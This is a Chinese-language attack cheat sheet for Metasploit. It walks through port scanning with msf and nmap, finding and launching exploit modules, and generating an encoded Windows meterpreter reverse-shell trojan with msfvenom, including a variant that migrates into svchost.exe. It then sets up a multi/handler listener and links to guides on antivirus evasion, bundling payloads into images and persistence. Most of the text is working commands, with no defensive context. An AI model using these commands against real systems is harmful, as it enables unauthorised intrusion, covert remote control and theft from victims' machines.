攻击方式 利用漏洞 利用后门
一 利用漏洞
1 扫描端口
(一)使用msf扫描
(1)查看可用端口
search portscan
(2)使用扫描模块
use *****
(3)查看配置选项,配置扫描模块
show options
set LPOST ***
(4)运行扫描模块
run
(二)使用nmap 扫描
nmap -O -Pn/-p0 IP
nmap -sV IP
2 搜索漏洞
search 服务名(version)
3 使用漏洞模块
use ***
4 配置漏洞模块
show options
set HOST IP
5 发起进攻
exploit
二 利用木马
1 生成木马(固定写法)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.5 lport=6666 -f exe > hack.exe
捆绑svchost.exe应用程序
msfvenom -p windows/meterpreter/reverse_tcp --platform LHOST=192.168.1.4 LPORT=5555 -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f exe > /root/Desktop/shellcode.exe
-p 选择payload
-e 选择编码器
-i 编码次数
-f 编译后的格式
-x 捆绑程序
-a 系统位数 x64 x86 x86_64
想办法让靶机执行木马
2 服务器启动接受木马请求
打开数据库服务
service postgresql start
启动metasploit
msfconsole
选择攻击模块
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp
查看设置选项,配置HOST PORT
show options
启动服务
run
免杀
https://blog.csdn.net/weixin_40602516/article/details/81144189
https://blog.csdn.net/zsc201825/article/details/80918185
https://blog.csdn.net/weixin_39997829/article/details/80001681
图片捆绑
https://blog.csdn.net/xiaoi123/article/details/78915374
自己自启
https://www.cnblogs.com/findumars/p/6435434.html
使用mingw32 自研
apt-get install mingw-w64
修改FakeImageExploiter.sh文件,替换成i686-w64-mingw32-gcc